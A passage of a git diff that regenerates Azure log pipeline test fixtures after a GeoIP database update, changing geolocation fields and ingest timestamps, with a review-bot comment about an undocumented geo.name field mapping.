-1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "ip": "81.2.69.144" 
@@ -30,14 +24,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 + "lon": -0.0931, + "lat": 51.5142 } }, "cloud": { 
@@ -58,7 +52,7 @@ "event": { "duration": 0, "action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", - "ingested": "2021-12-09T13:30:56.983745700Z", + "ingested": "2021-12-14T14:35:43.155209455Z", "original": "{\"callerIpAddress\":\"81.2.69.144\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTK
EYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "type": [ "change" diff --git a/packages/azure/data_stream/activitylogs/fields/ecs.yml b/packages/azure/data_stream/activitylogs/fields/ecs.yml index 1839a0db982..3ec824a0dee 100644 --- a/packages/azure/data_stream/activitylogs/fields/ecs.yml +++ b/packages/azure/data_stream/activitylogs/fields/ecs.yml @@ -74,6 +74,8 @@ external: ecs - name: geo.region_name external: ecs +- name: geo.name + external: ecs - name: geo.region_iso_code external: ecs - name: log.level diff --git a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json index cf3e1022d17..809dba919ca 100644 --- a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json +++ b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json 
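Review bot: The new `geo.name` field mapping in `activitylogs/fields/ecs.yml` is not covered by the Azure changelog entry in this change, which only mentions regenerating test files with the new GeoIP database, and none of the regenerated activitylogs fixtures visible here populate `geo.name`. A mapping addition changes the index template, so either the changelog entry should name it (for example `- description: Add geo.name ECS field mapping to activitylogs`) or, if it is unused, the line can be dropped.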
@@ -14,7 +14,7 @@ "event": { "duration": 0, "action": "Update device", - "ingested": "2021-12-09T13:30:57.501235200Z", + "ingested": "2021-12-14T14:35:43.558271296Z", "original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "kind": "event", "outcome": "success" diff --git a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json index bf1e67974ba..cc23f06480d 100644 --- a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json +++ b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json 
@@ -1,14 +1,14 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event": { - "ingested": "2021-12-09T13:30:57.966322200Z", + "ingested": "2021-12-14T14:35:43.988896537Z", "kind": "event" }, + "ecs": { + "version": "1.12.0" + }, "tags": [ "preserve_original_event" ] diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json index 17cd84347c1..a6f73e4b7fc 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json 
+++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "ApplicationGatewayAccess", - "ingested": "2021-12-09T13:30:58.364774600Z", + "ingested": "2021-12-14T14:35:44.368671668Z", "original": "{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18234,\"httpMethod\":\"GET\",\"requestUri\":\"/nmaplowercheck1602448229\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":108,\"sentBytes\":1636,\"timeTaken\":78,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}},{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18706,\"httpMethod\":\"GET\",\"requestUri\":\"/evox/about\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":94,\"sentBytes\":1636,\"timeTaken\":62,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}}]}", "kind": "event" }, 
diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json index 992b7187041..86c17a63472 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-12-09T13:30:58.413839200Z", + "ingested": "2021-12-14T14:35:44.421779579Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json index 7b7dd9ec56c..afdc2512e8d 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json 
@@ -11,7 +11,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-12-09T13:30:58.470556500Z", + "ingested": "2021-12-14T14:35:44.477324350Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" @@ -56,7 +56,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-12-09T13:30:58.470564700Z", + "ingested": "2021-12-14T14:35:44.477326822Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" 
diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json index 25ab37c8c0a..f8bcb635241 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-12-09T13:30:58.573546900Z", + "ingested": "2021-12-14T14:35:44.571614650Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\",\\\"apiVersion\\\":\\\"audit.k8s.io/v1\\\",\\\"level\\\":\\\"Metadata\\\",\\\"auditID\\\":\\\"22af12c3-a1fe-4f2c-99a9-3cdde671dbfe\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\",\"stream\":\"stdout\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json index e65b5cdaed5..d7d72f3f589 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-managed-identity.log-expected.json 
@@ -21,7 +21,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:58.981445700Z", + "ingested": "2021-12-14T14:35:44.888547736Z", "original": "{\"Level\":4,\"category\":\"ManagedIdentitySignInLogs\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"durationMs\":0,\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-b540-4792-a2a2-81818990a95b\",\"correlationId\":\"22222222-92d0-4887-9ead-46258539a699\",\"createdDateTime\":\"2021-01-23T20:44:29.7688982+00:00\",\"flaggedForReview\":false,\"id\":\"22222222-0b57-4b77-bf1a-317a88591a00\",\"ipAddress\":\"\",\"isInteractive\":false,\"location\":{\"city\":\"\",\"countryOrRegion\":\"\",\"geoCoordinates\":{\"latitude\":0,\"longitude\":0},\"state\":\"\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Windows Azure Service Management API\",\"resourceId\":\"22222222-ba00-4fd7-ba43-dac1f8f63013\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-864d-4e00-9882-ff649530f186\",\"servicePrincipalName\":\"ASC provisioning Dependency agent for Linux\",\"status\":{\"errorCode\":0},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/tenantId/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"tenantId\",\"time\":\"2021-01-23T20:44:29.7688982Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json index a699faee34e..162fe091f2f 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-non-interactive-user.log-expected.json 
@@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -55,7 +49,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.123869500Z", + "ingested": "2021-12-14T14:35:45.011793501Z", "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"NonInteractiveUserSignInLogs\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"durationMs\":0,\"identity\":\"Hello World\",\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA für Gäste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for 
Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD 
joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json index 7bb15bff40d..eb72681e4b1 100644 
--- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-service-principal.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -55,7 +49,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:30:59.521517Z", + "ingested": "2021-12-14T14:35:45.381340001Z", "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", "kind": "event", "action": "Sign-in activity", diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json index 8dfb4154a46..0d29bb1969f 100644 
--- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json @@ -7,20 +7,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
